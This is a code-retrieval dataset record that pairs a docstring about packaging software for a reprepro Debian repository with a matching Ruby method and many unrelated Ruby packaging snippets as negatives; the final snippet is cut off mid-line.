Package the given package unless it is already registered in reprepro; if an existing source directory is given it will be used for packaging, otherwise the package will be bootstrapped | def package(pkginfo, options = Hash.new)
options, unknown_options = Kernel.filter_options options,
:force_update => false,
:patch_dir => nil,
:distribution => nil, # allow to override global settings
:architecture => nil
options[:distribution] ||= target_platform.distribution_release_name
options[:architecture] ||= target_platform.architecture
debian_pkg_name = debian_name(pkginfo)
if options[:force_update]
dirname = packaging_dir(pkginfo)
if File.directory?(dirname)
Packager.info "Debian: rebuild requested -- removing #{dirname}"
FileUtils.rm_rf(dirname)
end
end
options[:packaging_dir] = packaging_dir(pkginfo)
options[:release_name] = rock_release_name
begin
# Set the current pkginfo to set the install directory
# correctly
# FIXME: needs to be refactored
#
@packager_lock.lock
@current_pkg_info = pkginfo
pkginfo = prepare_source_dir(pkginfo, options.merge(unknown_options))
if pkginfo.build_type == :orogen || pkginfo.build_type == :cmake || pkginfo.build_type == :autotools
package_default(pkginfo, options)
elsif pkginfo.build_type == :ruby
# Import bundles since they do not need to be build and
# they do not follow the typical structure required for gem2deb
if pkginfo.name =~ /bundles/
package_importer(pkginfo, options)
else
package_ruby(pkginfo, options)
end
elsif pkginfo.build_type == :archive_importer || pkginfo.build_type == :importer_package
package_importer(pkginfo, options)
else
raise ArgumentError, "Debian: Unsupported package type #{pkginfo.build_type} for #{pkginfo.name}"
end
ensure
@current_pkg_info = nil
@packager_lock.unlock
end
end | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def package\n unless @package\n @package = package_resource_class.new(download_dest, run_context)\n tailor_package_to_platform\n end\n @package\n end",
"def bundle_package(*args, &block)\n ruby_package(*args) do |pkg|\n Autoproj.env_add_path 'ROCK_BUNDLE_PATH', pkg.srcdir\n if block_given?\n pkg.instance_eval(&block)\n end\n end\nend",
"def install_package(target_package_path); raise NotImplementedError; end",
"def package(pkg, options = Hash.new)\n\n options, unknown_options = Kernel.filter_options options,\n :force_update => false,\n :existing_source_dir => nil,\n :patch_dir => nil\n\n if options[:force_update]\n dirname = File.join(OBS_BUILD_DIR, debian_name(pkg))\n if File.directory?(dirname)\n Packager.info \"Debian: rebuild requested -- removing #{dirname}\"\n FileUtils.rm_rf(dirname)\n end\n end\n\n prepare_source_dir(pkg, options)\n\n if pkg.kind_of?(Autobuild::CMake) || pkg.kind_of?(Autobuild::Autotools)\n package_deb(pkg, options)\n elsif pkg.kind_of?(Autoproj::RubyPackage)\n package_ruby(pkg, options)\n else\n raise ArgumentError, \"Debian: Unsupported package type #{pkg.class} for #{pkg.name}\"\n end\n end",
"def package_ruby(pkg, options) \n # update dependencies in any case, i.e. independant if package exists or not\n deps = dependencies(pkg)\n Dir.chdir(pkg.srcdir) do\n begin\n logname = \"obs-#{pkg.name.sub(\"/\",\"-\")}\" + \"-\" + Time.now.strftime(\"%Y%m%d-%H%M%S\").to_s + \".log\"\n gem = FileList[\"pkg/*.gem\"].first\n if not gem \n Packager.info \"Debian: creating gem from package #{pkg.name}\"\n if !system(\"rake gem 2> #{File.join(OBS_LOG_DIR, logname)}\")\n raise \"Debian: failed to create gem from RubyPackage #{pkg.name}\"\n Packager.warn \" check: #{File.expand_path(logname)}\"\n end\n end\n\n gem = FileList[\"pkg/*.gem\"].first\n\n # Make the naming of the gem consistent with the naming schema of\n # rock packages\n #\n # Make sure the gem has the fullname, e.g.\n # tools-metaruby instead of just metaruby\n gem_rename = gem.sub(basename(pkg.name), canonize(pkg.name))\n if gem != gem_rename\n Packager.info \"Debian: renaming #{gem} to #{gem_rename}\"\n FileUtils.mv gem, gem_rename\n gem = gem_rename\n end\n\n Packager.debug \"Debian: copy #{gem} to #{packaging_dir(pkg)}\"\n FileUtils.cp gem, packaging_dir(pkg)\n gem_final_path = File.join(packaging_dir(pkg), File.basename(gem))\n\n # Prepare injection of dependencies\n options[:deps] = deps\n convert_gem(gem_final_path, options)\n # register gem with the correct naming schema\n # to make sure dependency naming and gem naming are consistent\n @ruby_rock_gems << debian_name(pkg)\n rescue Exception => e\n raise \"Debian: failed to create gem from RubyPackage #{pkg.name} -- #{e.message}\\n#{e.backtrace.join(\"\\n\")}\"\n end\n end\n end",
"def setup_package(package_name, &block)\n if !block\n raise ConfigError.new, \"you must give a block to #setup_package\"\n end\n\n package_definition = Autoproj.workspace.manifest.package(package_name)\n if !package_definition\n raise ConfigError.new, \"#{package_name} is not a known package\"\n elsif package_definition.autobuild.kind_of?(Autobuild::DummyPackage)\n # Nothing to do!\n else\n package_definition.add_setup_block(block)\n end\nend",
"def package!\n Packager.package!(self)\n Cleaner.remove_packaging(self)\n end",
"def needpackage *args\n\t\tpackage *args\n\tend",
"def package(output_dir = Pathname(Dir.pwd).expand_path)\n # Check the source\n check_source!\n # Turn the source into component parts to build a gem out of\n gem_parts = read_source_parts\n # Write these parts to a directory\n gem_dir = write_gem_dir(gem_parts)\n # Build a .gem file from this directory, and leave it in the `output_dir`\n build_package(gem_dir, output_dir)\n end",
"def convert_package(pkginfo, packaging_dir,\n gem_name: nil,\n patch_dir: nil\n )\n Packager.info \"Package Ruby: '#{pkginfo.name}' with gem_name: '#{gem_name}'\"\n\n # update dependencies in any case, i.e. independent if package exists or not\n deps = pkginfo.dependencies\n Dir.chdir(pkginfo.srcdir) do\n begin\n logname = \"package-ruby-#{pkginfo.name.sub(\"/\",\"-\")}\" + \"-\" + Time.now.strftime(\"%Y%m%d-%H%M%S\").to_s + \".log\"\n logfile = File.join(log_dir, logname)\n\n gem = FileList[\"pkg/*.gem\"].first\n if not gem\n Packager.info \"#{self.class}: preparing gem generation in #{Dir.pwd}\"\n\n # Rake targets that should be tried for cleaning\n gem_clean_success = false\n Gem.clean_alternatives.each do |target|\n msg, status = Open3.capture2e(pkginfo.env, \"bundle exec rake #{target}\")\n if !status.success?\n Packager.info \"#{self.class}: failed to clean package '#{pkginfo.name}' using target '#{target}' #{msg} (see #{logfile})\"\n File.open(logfile,\"a+\") {|f| f.puts msg }\n else\n Packager.info \"#{self.class}: succeeded to clean package '#{pkginfo.name}' using target '#{target}'\"\n gem_clean_success = true\n break\n end\n end\n if not gem_clean_success\n Packager.warn \"#{self.class}: failed to cleanup ruby package '#{pkginfo.name}' -- continuing without cleanup\"\n end\n\n Packager.info \"#{self.class}: ruby package Manifest.txt is being autogenerated\"\n Package2Gem.generate_manifest_txt\n Package2Gem.cleanup_multiple_gemspec(gem_name)\n\n Packager.info \"#{self.class}: creating gem from package #{pkginfo.name} [#{File.join(log_dir, logname)}]\"\n\n if patch_pkg_dir(pkginfo.name, patch_dir, whitelist: [\"*.gemspec\", \"Rakefile\", \"metadata.yml\"])\n Packager.info \"#{self.class}: patched build files for ruby package before gem building: #{pkginfo.name}\"\n end\n\n # Allowed gem creation alternatives\n gem_creation_success = false\n\n # Gemspec often use the 'git ls -z' listings, which\n # might break if hidden files will be removed\n # without commiting -- so temporarily add and revert\n # again, to maintain the original commit id\n # TBD: or leave the commit and list the last N commits in the changelog\n Packager.info \"#{self.class}: temporarily commit changes in #{Dir.pwd}\"\n _,_,git_add_status = Open3.capture3(\"git add -A\")\n msg,git_commit_status = Open3.capture2(\"git commit -m 'Apaka: gem creation' --author 'Apaka Packager, <apaka@autocommit>'\")\n if !git_commit_status.success?\n Packager.info \"#{self.class}: commit failed: #{msg}\"\n end\n Gem.creation_alternatives.each do |target|\n msg, status = Open3.capture2e(pkginfo.env, \"bundle exec rake #{target}\")\n if !status.success?\n Packager.info \"#{self.class}: failed to create gem using target '#{target}' (see #{logfile})\"\n File.open(logfile,\"a+\") do |f|\n f.puts msg\n f.puts pkginfo.env\n end\n else\n Packager.info \"#{self.class}: succeeded to create gem using target '#{target}'\"\n gem_creation_success = true\n break\n end\n end\n if git_commit_status.success?\n Packager.info \"#{self.class}: git package status\"\n msg, git_revert = Open3.capture2(\"git reset --soft HEAD~1\")\n Packager.info \"#{self.class}: reversion of temporary commit failed\"\n end\n if not gem_creation_success\n raise RuntimeError, \"Debian: failed to create gem from RubyPackage #{pkginfo.name}\"\n end\n end\n\n gem = FileList[\"pkg/*.gem\"].first\n\n # Make the naming of the gem consistent with the naming schema of\n # other packages\n #\n # Make sure the gem has the fullname, e.g.\n # tools-metaruby instead of just metaruby\n 
if gem_name\n gem_name = gem.sub(Packaging.basename(pkginfo.name), gem_name)\n if gem != gem_name\n Packager.info \"#{self.class}: renaming #{gem} to #{gem_name}\"\n end\n else\n gem_name = gem\n end\n Packager.info \"#{self.class}: '#{pkginfo.name}' -- basename: #{Packaging.basename(pkginfo.name)} will be packaged as: #{gem_name}\"\n\n gem_final_path = File.join(packaging_dir, File.basename(gem_name))\n Packager.info \"#{self.class}: copy #{File.join(Dir.pwd, gem)} to #{gem_final_path}\"\n FileUtils.cp gem, gem_final_path\n return gem_final_path\n\n rescue Exception => e\n raise RuntimeError, \"#{self.class}: failed to create gem from RubyPackage #{pkginfo.name} -- #{e.message}\\n#{e.backtrace.drop(1).map{|s| \"\\t#{s}\"}}\"\n end\n end\n end",
"def source_package(options)\n package_common(options) do |pkg|\n pkg.srcdir = pkg.name\n yield(pkg) if block_given?\n end\nend",
"def package!\n Backup::Packager.new(self).package!\n end",
"def package_dependency(dep, bundle_info)\n info \"Starting packaging #{dep}\"\n\n instance = if dep.is_a? String\n dependency_object_by_name dep\n else\n dep\n end\n\n onError \"Invalid dependency name: #{dep}\" unless instance\n\n files = instance.getInstalledFiles\n\n if !files || files.empty?\n error \"Dependency '#{dep}' has no files to package\"\n return nil\n end\n\n # Add symbolic link targets\n links_found = true\n total_links = 0\n handled = []\n\n while links_found\n\n links_found = false\n\n files.each do |f|\n full = File.join(DependencyInstallFolder, f)\n\n next if handled.include? full\n\n next unless File.exist?(full) && File.symlink?(full)\n\n link_target = File.join(File.dirname(f), File.readlink(full))\n\n unless child_path?(DependencyInstallFolder,\n File.join(DependencyInstallFolder, link_target))\n onError 'symbolic link to be installed points outside the dependency folder: ' +\n link_target.to_s\n end\n\n links_found = true\n total_links += 1\n handled.append full\n files.append link_target\n end\n end\n\n handled = nil\n\n info \"Resolved #{total_links} symbolic links in packaged file list\" if total_links > 0\n\n precompiled_name = instance.getNameForPrecompiled + '_' + CurrentPlatform\n zip_name = precompiled_name + '.tar.xz'\n info_file = precompiled_name + '_info.txt'\n hash_file = precompiled_name + '_hash.txt'\n\n # Check that all exist\n Dir.chdir(DependencyInstallFolder) do\n files.each do |f|\n unless File.exist? f\n onError \"Dependency file that should be packaged doesn't exist: \" + f.to_s\n end\n end\n\n files_to_restore = strip_files_if_needed files\n\n File.open(info_file, 'w') do |f|\n f.puts \"RubySetupSystem precompiled library for #{CurrentPlatform}\"\n f.puts instance.Name + ' retrieved from ' + instance.RepoURL\n f.puts instance.Version.to_s + ' Packaged at ' + Time.now.to_s\n f.puts ''\n f.puts \"You can probably find license from the repo url if it isn't included here\"\n f.puts 'This info file is included in ' + zip_name\n end\n\n # When bundling everything needs to be made clean\n File.unlink zip_name if File.exist?(zip_name) && $options[:bundle]\n\n info \"Compressing files into #{zip_name}\"\n\n # Write a tar file with lzma compression\n runSystemSafe('tar', '-cJf', zip_name, info_file, *files)\n\n restore_stripped_files files_to_restore\n\n onError 'Failed to create zip file' unless File.exist? zip_name\n\n hash = SHA3::Digest::SHA256.file(zip_name).hexdigest\n\n # Write hash to file\n File.open(hash_file, 'w') do |f|\n f.puts hash\n end\n\n success \"Done with #{dep}, created: #{zip_name}\"\n info \"#{zip_name} SHA3: \" + hash\n # info \"#{zip_name} PLATFORM: \" + CurrentPlatform\n bundle_info[:dep_files].append zip_name\n return { name: precompiled_name, hash: hash }\n end\nend",
"def package_plugin(name)\n `cd #{@repository_path}; rake feather:package path=#{name} target=#{@build_path}`\n end",
"def packaging_task(dir_path, pkg_name)\n chdir dir_path do\n sh \"#{ZIP} #{ZIP_ARGS} -r -o ../#{pkg_name} * **/*\"\n end\nend",
"def package *args\n\t\targs.each do | name |\n\t\t\treturn if haspackage? name\n\t\tend\n\t\t@cf.cfp_logger.notify VERBOSE_MAJOR,\"Skipping - package #{args.join(',')} not installed\"\n\t\traise PackageNotInstalledError.new('Package '+args.join(\",\")+' not installed')\n\tend",
"def build_package\n # Force timestamp to be initialized before anything else. This gives us a\n # stable timestamp for the process.\n timestamp\n # Prepare the work area: copy files from root_path to work_path based on\n # the resolved Manifest.txt.\n prepare_work_area\n # Anything that has been modified locally needs to be reset.\n restore_modified_files\n # Save both the final release metadata and the in-package release metadata.\n save_release_metadata\n # Vendor the dependencies for the package.\n vendor_dependencies\n # Request that supporting plug-ins build the package.\n request_build_package\n end",
"def register_package(package, block = nil, package_set = main_package_set, file = nil)\n invalidate_ignored_package_names\n pkg = PackageDefinition.new(package, package_set, file)\n pkg.add_setup_block(block) if block\n @packages[package.name] = pkg\n metapackage pkg.package_set.name, pkg.autobuild\n metapackage \"#{pkg.package_set.name}.all\", pkg.autobuild\n pkg\n end",
"def build\n @model.custom_package? ? custom_package : standard_package\n end",
"def install_custom!\n package package_name do\n source new_resource.source.to_s\n checksum new_resource.checksum unless new_resource.checksum.nil?\n end\n end",
"def install(pkg)\n package pkg do\n action :install\n end\nend",
"def packaging_task(dir_path, pkg_name)\n chdir dir_path do\n sh \"#{ZIP} -9 -r -o ../#{pkg_name} * **/*\"\n end\nend",
"def package(path, target)\n # Load manifest\n puts \"Load manifest...\"\n manifest = YAML::load_file(File.join(path, 'manifest.yml'))\n \n # Target directory for package files\n puts \"Target is: #{target}\"\n Dir.mkdir(target) if not File.exists?(target)\n \n # Package name\n package = \"#{manifest['name']}-#{manifest['version']}\"\n puts \"Package: #{package}\"\n \n # Tgz\n manifest['package'] = \"#{package}.tgz\"\n command = \"tar -czf #{package}.tgz --exclude pkg -C #{path} .\"\n puts \"Packing: #{command}\"\n system command\n \n # Move\n puts \"Finishing..\"\n FileUtils.mv(\"#{package}.tgz\", target)\n File.open(File.join(target, \"#{package}.yml\"), 'w') do |f|\n f.puts(manifest.to_yaml)\n f.close\n end\n \n puts \"Done.\"\nend",
"def package_build!(tmp_dir)\n # copying template files\n FileUtils.cp_r(File.expand_path(File.join(File.dirname(__FILE__), \"debian\")), tmp_dir)\n Dir.chdir(tmp_dir) do\n ppath = File.join(\"..\", self.package_filename)\n File.delete(ppath) if File.exists? ppath\n deb_files = File.join(\"..\", \"#{@package.name}_#{@package.version}*\")\n res = run_dpkg tmp_dir, @package.gpg_key \n if res or File.exists? ppath \n # mv can raise\n FileUtils.mv(Dir.glob(deb_files) , @dest_dir, :force => true)\n else\n ActiveRecord::Base.logger.debug \"Dpkg-buildpackage failed\"\n raise \"dpkg-buildpackage failed\"\n end\n end\n end",
"def package\n @package ||= Package.initialize_from_path(path: \"#{resource_path}/package\",\n client: @client)\n end",
"def before_package_create(package)\n end",
"def before_package_create(package)\n end",
"def package(*patterns)\n install_package_matching patterns\n end",
"def package(package_name)\n raise RuntimeError, \"#{self.class} needs to overwrite package\"\n end",
"def unpack_src(src_package, src_dir)\n package_dir = File.join(src_dir, src_package[:dir])\n sudo <<-SUDO\n sh -c '\n cd #{src_dir};\n test -d #{package_dir}.old && rm -fr #{package_dir}.old;\n test -d #{package_dir} && mv #{package_dir} #{package_dir}.old;\n #{src_package[:unpack]}\n chgrp -R #{group} #{package_dir}; \n chmod -R g+w #{package_dir};\n '\n SUDO\n end",
"def install_package host, package_name\n host.install_package package_name\n end",
"def locate_package(package_name, vers, verbose)\n local = has_local_package?(package_name)\n \n # It's true that we don't have a prerelase check here, but the\n # previous one we had didn't do anything, so it's better to have\n # none than one that doesn't work\n vers = \">= 0\" if vers == \">= 0-pre\"\n src_path = local ? locate_local_package(package_name) : \n BPM::Local.new.source_root(package_name, vers)\n\n return nil unless src_path\n\n pkg = BPM::Package.new(src_path)\n pkg.load_json # throws exception if json invalid\n pkg\n end",
"def install_golang_package(resource_name)\n ChefSpec::Matchers::ResourceMatcher.new(:golang_package, :install, resource_name)\n end",
"def install_custom!\n remote_file local_path do\n source new_resource.source.to_s\n checksum new_resource.checksum unless new_resource.checksum.nil?\n end\n dpkg_package local_path\n end",
"def deploy(package_path, opts={}, &block)\n end",
"def input(package)\n path_to_package = download_if_necessary(package, version)\n\n if File.directory?(path_to_package)\n setup_py = File.join(path_to_package, \"setup.py\")\n else\n setup_py = path_to_package\n end\n\n if !File.exist?(setup_py)\n logger.error(\"Could not find 'setup.py'\", :path => setup_py)\n raise \"Unable to find python package; tried #{setup_py}\"\n end\n\n load_package_info(setup_py)\n install_to_staging(setup_py)\n end",
"def manual_package_install(pkg_dependencies=[])\n\n unless pkg_dependencies.nil?\n pkg_dependencies.each do |pkg|\n\n if pkg =~ /\\.rpm/\n filename = $1 if pkg =~ /\\/(\\w+[a-zA-Z0-9\\-\\_\\.]+\\.rpm)\\z/\n p \"FILENAME: #{filename}\"\n remote_file \"#{Chef::Config[:file_cache_path]}/#{filename}\" do\n source \"#{pkg}\"\n action :create_if_missing\n end\n end\n\n package pkg do\n action :install\n if pkg =~ /\\.rpm/\n source \"#{Chef::Config[:file_cache_path]}/#{filename}\"\n provider Chef::Provider::Package::Rpm\n end\n end\n\n end\n end\n\nend",
"def package\n build\n # there is no need for IPA or dSYM unless we have a device/macosx build,\n # so do that part only on iphoneos/macosx SDKs\n #\n if(@configuration.sdk.eql? \"iphoneos\") then\n package_ios_app\n package_dsym\n package_artifact unless !@configuration.zip_artifacts\n elsif (@configuration.sdk.eql? \"macosx\") then\n package_macos_app\n package_dsym\n package_artifact unless !@configuration.zip_artifacts\n else\n package_simulator_app\n end\n end",
"def install_package(package_name, options = {})\n return true if install_package_impl(package_name, options)\n if options[:source]\n if options[:no_proxy]\n install_package package_name, options.merge(:source => false)\n else\n install_package package_name, options.merge(:no_proxy => true)\n end\n else\n return false unless options[:no_proxy]\n install_package package_name, options.merge(:no_proxy => true)\n end\n end",
"def register_debian_package(debian_pkg_file, release_name, codename, force = false)\n begin\n reprepro_dir = File.join(deb_repository, release_name)\n\n debian_package_dir = File.dirname(debian_pkg_file)\n debfile = File.basename(debian_pkg_file)\n debian_pkg_name = debfile.split(\"_\").first\n logfile = File.join(log_dir,\"#{debian_pkg_name}-reprepro.log\")\n\n if force\n deregister_debian_package(debian_pkg_name, release_name, codename, true)\n end\n @reprepro_lock.lock\n Dir.chdir(debian_package_dir) do\n if !File.exists?(debfile)\n raise ArgumentError, \"Apaka::Packaging::register_debian_package: could not find '#{debfile}' in directory: '#{debian_package_dir}'\"\n end\n\n cmd = [reprepro_bin]\n cmd << \"-V\" << \"-b\" << reprepro_dir <<\n \"includedeb\" << codename << debfile\n\n Packager.info \"Register deb file: #{cmd.join(\" \")} &>> #{logfile}\"\n if !system(*cmd, [:out, :err] => [logfile, \"a\"], :close_others => true)\n raise RuntimeError, \"Execution of #{cmd.join(\" \")} failed -- see #{logfile}\"\n end\n\n if not reprepro_has_dsc?(debian_pkg_name, release_name, codename, true)\n dscfile = Dir.glob(\"*.dsc\").first\n cmd = [reprepro_bin]\n cmd << \"-V\" << \"-b\" << reprepro_dir <<\n \"includedsc\" << codename << dscfile\n Packager.info \"Register dsc file: #{cmd.join(\" \")} &>> #{logfile}\"\n if !system(*cmd, [:out, :err] => [logfile, \"a\"], :close_others => true)\n raise RuntimeError, \"Execution of #{cmd.join(\" \")} failed -- see #{logfile}\"\n end\n end\n end\n ensure\n @reprepro_lock.unlock\n end\n end",
"def package_setup\n raise NotImplementedError\n end",
"def inject_package(hash, info, package)\n arch = info[\"Architecture\"]\n arch = arch == \"all\" ? all_map : [arch]\n arch.map do |arch|\n package_file_name = File.join(\n package_root, package_bucket, origin,\n dist, component, \"binary-#{arch}\",\n File.basename(package)\n )\n hash.deep_merge!(\n \"apt\" => {\n origin => {\n dist => {\n \"components\" => {\n component => {\n \"binary-#{arch}\" => {\n info[\"Package\"] => {\n info[\"Version\"] => info.merge!(\n \"Filename\" => package_file_name,\n \"Size\" => File.size(package),\n ),\n },\n },\n \"binary-i386\" => {},\n },\n },\n },\n },\n },\n )\n File.join(\"apt\", origin, package_file_name)\n end\n end",
"def define_package_tasks\n prerelease_version\n\n Gem::PackageTask.new spec do |pkg|\n pkg.need_tar = @need_tar\n pkg.need_zip = @need_zip\n end\n\n desc \"Install the package as a gem. (opt. NOSUDO=1)\"\n task :install_gem => [:clean, :package, :check_extra_deps] do\n install_gem Dir[\"pkg/*.gem\"].first\n end\n\n desc \"Package and upload; Requires VERSION=x.y.z (optional PRE=a.1)\"\n task :release => [:prerelease, :release_to, :postrelease]\n\n # no doco, invisible hook\n task :prerelease do\n abort \"Fix your version before you release\" if spec.version.to_s =~ /borked/\n end\n\n # no doco, invisible hook\n task :release_to\n\n # no doco, invisible hook\n task :postrelease\n\n desc \"Sanity checks for release\"\n task :release_sanity do\n v = ENV[\"VERSION\"] or abort \"Must supply VERSION=x.y.z\"\n\n pre = ENV[\"PRERELEASE\"] || ENV[\"PRE\"]\n v += \".#{pre}\" if pre\n\n c = changes[/\\d\\S+/]\n\n abort \"Versions don't match: %s vs %s\" % [v, version] if v != version\n abort \"Versions don't match %s: %s vs %s\" % [history_file, v, c] if v != c\n end\n end",
"def input(vnd_pkg_path)\n\n # general params\n in_bundle = vnd_pkg_path.gsub(/^(.+\\/+)*vendor\\/+|\\/(?=\\/)|\\/+$/, \"\")\n @name = in_bundle.gsub(/[\\W]+/, \"-\")\n json = {}\n if @once\n @once = true\n raise FPM::InvalidPackageConfiguration, \"You can't input multiple bundle names. Only one package can be built at a time currently. Use a shell loop please.\"\n elsif in_bundle =~ /^composer\\/\\w+\\.\\w+/\n raise FPM::InvalidPackageConfiguration, \"composer/*.* files specified as input. Supply only one bundle id.\"\n end\n\n # copying mode\n if File.exist?(\"vendor/\" + in_bundle)\n json = parse_lock(\"composer.lock\", in_bundle)[in_bundle]\n # localize contents below vendor/*/*/ input directory\n ::Dir.chdir(\"./vendor/#{in_bundle}/#{json['target-dir']}/\") do\n FileUtils.cp_r(glob(\"./*\"), build_path)\n end\n else\n # download one package (and dependencies, which are thrown away afterwards)\n ::Dir.chdir(staging_path) do\n ver = attributes[:composer_ver]\n safesystem(\n composer, \"require\", \"--prefer-dist\", \"--update-no-dev\", \"--ignore-platform-reqs\",\n \"--no-ansi\", \"--no-interaction\", in_bundle, *(ver ? [ver] : [])\n )\n # localize Vnd/Pkg folder\n json = parse_lock(\"composer.lock\", in_bundle)[in_bundle]\n FileUtils.mv(glob(\"./vendor/#{in_bundle}/#{json['target-dir']}/*\"), build_path)\n FileUtils.rm_r(glob(\"#{staging_path}/*\"))\n end\n end\n\n #-- staging\n # At this point the build_path contains just the actual class files, etc.\n # Conversion to sys/phar/sysphar is handled in convert() along with the\n # dependency translation.\n composer_json_import(json)\n @target_dir = json.include?(\"target-dir\") ? json[\"target-dir\"] : in_bundle\n attributes[:phar_format] = \"zip+gz\" unless attributes[:phar_format_given?]\n end",
"def prepare_source_dir(orig_pkginfo, options = Hash.new)\n pkginfo = orig_pkginfo.dup\n\n options, unknown_options = Kernel.filter_options options,\n :existing_source_dir => nil,\n :packaging_dir => File.join(@build_dir, debian_name(pkginfo))\n\n pkg_dir = options[:packaging_dir]\n if not File.directory?(pkg_dir)\n FileUtils.mkdir_p pkg_dir\n end\n\n # Only when there is no importer or when the VCS supports distribution (here git)\n # then we allow to use the local version\n support_local_import = false\n if !pkginfo.importer_type || pkginfo.importer_type == :git\n Packager.info \"Import from local repository is supported for #{pkginfo.name}\"\n support_local_import = true\n else\n Packager.info \"Import from local repository is not supported for #{pkginfo.name}\"\n end\n\n Packager.debug \"Preparing source dir #{pkginfo.name}\"\n # If we have given an existing source directory we should use it, \n # but only if it is a git repository\n pkg_target_importdir = File.join(pkg_dir, plain_dir_name(pkginfo))\n if support_local_import && existing_source_dir = options[:existing_source_dir]\n import_from_local_src_dir(pkginfo, existing_source_dir, pkg_target_importdir)\n # update to the new srcdir\n pkginfo.srcdir = pkg_target_importdir\n else\n pkginfo.import(pkg_target_importdir)\n end\n # remove these even on fresh imports. some repositories\n # have prepopulated build directories and similar\n remove_excluded_dirs(pkg_target_importdir)\n remove_excluded_files(pkg_target_importdir)\n\n pkginfo\n end",
"def package_common(package_type, spec, &block)\n package_name = Autoproj.package_name_from_options(spec)\n\n if Autobuild::Package[package_name]\n current_file = Autoproj.current_file[1]\n old_file = Autoproj.workspace.manifest.definition_file(package_name)\n Autoproj.warn \"#{package_name} from #{current_file} is overridden by the definition in #{old_file}\"\n\n return Autobuild::Package[package_name]\n end\n\n pkg = Autoproj.define(package_type, spec, &block)\n pkg.srcdir = pkg.name\n pkg\nend",
"def package(name)\n Packaged.instance self , name\n end",
"def package(destination)\n output[:messages] << \"Cookbook(s) packaged to #{destination}\"\n end",
"def add_package(package)\n [package_handler(File.extname(package).tr(\".\", \"\")).add(content, package)].flatten.compact\n end",
"def move_package\n begin\n package_file = File.join(@tmpdir, 'pkg', \"#{@plugin.vendor}-#{@package_name}-#{@plugin.metadata[:version]}.tar.gz\")\n FileUtils.cp(package_file, '.')\n rescue => e\n puts 'Could not copy package to working directory'\n raise e\n end\n end",
"def create_package(logger:, release_model:, fix:, compiled_release:, package_meta:, release_dir:)\n name = package_meta['name']\n version = package_meta['version']\n\n package_attrs = {\n release: release_model,\n name: name,\n sha1: nil,\n blobstore_id: nil,\n fingerprint: package_meta['fingerprint'],\n version: version,\n }\n\n package = Models::Package.new(package_attrs)\n package.dependency_set = package_meta['dependencies']\n\n save_package_source_blob(logger, package, fix, package_meta, release_dir) unless compiled_release\n\n package.save\n end",
"def install\n should = @resource.should(:ensure)\n self.debug \"Ensuring => #{should}\"\n wanted = @resource[:name]\n\n # XXX: We don't actually deal with epochs here.\n case should\n when true, false, Symbol\n # pass\n else\n # Add the package version\n wanted += \"-#{should}\"\n end\n output = rug \"--quiet\", :install, \"-y\", wanted\n\n unless self.query\n raise Puppet::ExecutionFailure.new(\n \"Could not find package #{self.name}\"\n )\n end\n end",
"def package(pkg)\n @pkg = pkg\n end",
"def install\n should = @resource.should(:ensure)\n self.debug \"Ensuring => #{should}\"\n wanted = @resource[:name]\n\n # XXX: We don't actually deal with epochs here.\n case should\n when true, false, Symbol\n # pass\n else\n # Add the package version\n wanted = \"#{wanted}-#{should}\"\n end\n\n #This has been tested with following zypper versions\n #SLE 10.2: 0.6.104\n #SLE 11.0: 1.0.8\n #OpenSuse 10.2: 0.6.13\n #OpenSuse 11.2: 1.2.8\n #Assume that this will work on newer zypper versions\n\n #extract version numbers and convert to integers\n major, minor, patch = zypper_version.scan(/\\d+/).map{ |x| x.to_i }\n self.debug \"Detected zypper version #{major}.#{minor}.#{patch}\"\n\n #zypper version < 1.0 does not support --quiet flag\n quiet = \"--quiet\"\n if major < 1\n quiet = \"--terse\"\n end\n\n license = \"--auto-agree-with-licenses\"\n noconfirm = \"--no-confirm\"\n\n #zypper 0.6.13 (OpenSuSE 10.2) does not support auto agree with licenses\n if major < 1 and minor <= 6 and patch <= 13\n zypper quiet, :install, noconfirm, wanted\n else\n zypper quiet, :install, license, noconfirm, wanted\n end\n\n unless self.query\n raise Puppet::ExecutionFailure.new(\n \"Could not find package #{self.name}\"\n )\n end\n end",
"def install_from_src(src_package, src_dir)\n package_dir = File.join(src_dir, src_package[:dir])\n unpack_src(src_package, src_dir)\n sudo <<-SUDO\n sh -c '\n cd #{package_dir};\n #{src_package[:configure]}\n #{src_package[:make]}\n #{src_package[:install]}\n #{src_package[:post_install]}\n '\n SUDO\n end",
"def input(package)\n installdir = attributes[:virtualenv_install_location]\n m = /^([^=]+)==([^=]+)$/.match(package)\n package_version = nil\n\n is_requirements_file = (File.basename(package) == \"requirements.txt\")\n\n if is_requirements_file\n if !File.file?(package)\n raise FPM::InvalidPackageConfiguration, \"Path looks like a requirements.txt, but it doesn't exist: #{package}\"\n end\n\n package = File.join(::Dir.pwd, package) if File.dirname(package) == \".\"\n package_name = File.basename(File.dirname(package))\n logger.info(\"No name given. Using the directory's name\", :name => package_name)\n package_version = nil\n elsif m\n package_name = m[1]\n package_version = m[2]\n self.version ||= package_version\n else\n package_name = package\n package_version = nil\n end\n\n virtualenv_name = package_name\n\n self.name ||= package_name\n\n if self.attributes[:virtualenv_fix_name?]\n self.name = [self.attributes[:virtualenv_package_name_prefix],\n self.name].join(\"-\")\n end\n\n # prefix wins over previous virtual_install_location behaviour\n virtualenv_folder =\n if self.attributes[:prefix]\n self.attributes[:prefix]\n else\n File.join(installdir,\n virtualenv_name)\n end\n\n virtualenv_build_folder = build_path(virtualenv_folder)\n\n ::FileUtils.mkdir_p(virtualenv_build_folder)\n\n if self.attributes[:virtualenv_system_site_packages?]\n logger.info(\"Creating virtualenv with --system-site-packages\")\n safesystem(\"virtualenv\", \"--system-site-packages\", virtualenv_build_folder)\n else\n safesystem(\"virtualenv\", virtualenv_build_folder)\n end\n\n pip_exe = File.join(virtualenv_build_folder, \"bin\", \"pip\")\n python_exe = File.join(virtualenv_build_folder, \"bin\", \"python\")\n\n # Why is this hack here? It looks important, so I'll keep it in.\n safesystem(python_exe, pip_exe, \"install\", \"-U\", \"-i\",\n attributes[:virtualenv_pypi],\n \"pip\")\n\n extra_index_url_args = []\n if attributes[:virtualenv_pypi_extra_index_urls]\n attributes[:virtualenv_pypi_extra_index_urls].each do |extra_url|\n extra_index_url_args << \"--extra-index-url\" << extra_url\n end\n end\n\n find_links_url_args = []\n if attributes[:virtualenv_find_links_urls]\n attributes[:virtualenv_find_links_urls].each do |links_url|\n find_links_url_args << \"--find-links\" << links_url\n end\n end\n\n target_args = []\n if is_requirements_file\n target_args << \"-r\" << package\n else\n target_args << package\n end\n\n pip_args = [python_exe, pip_exe, \"install\", \"-i\", attributes[:virtualenv_pypi]] << 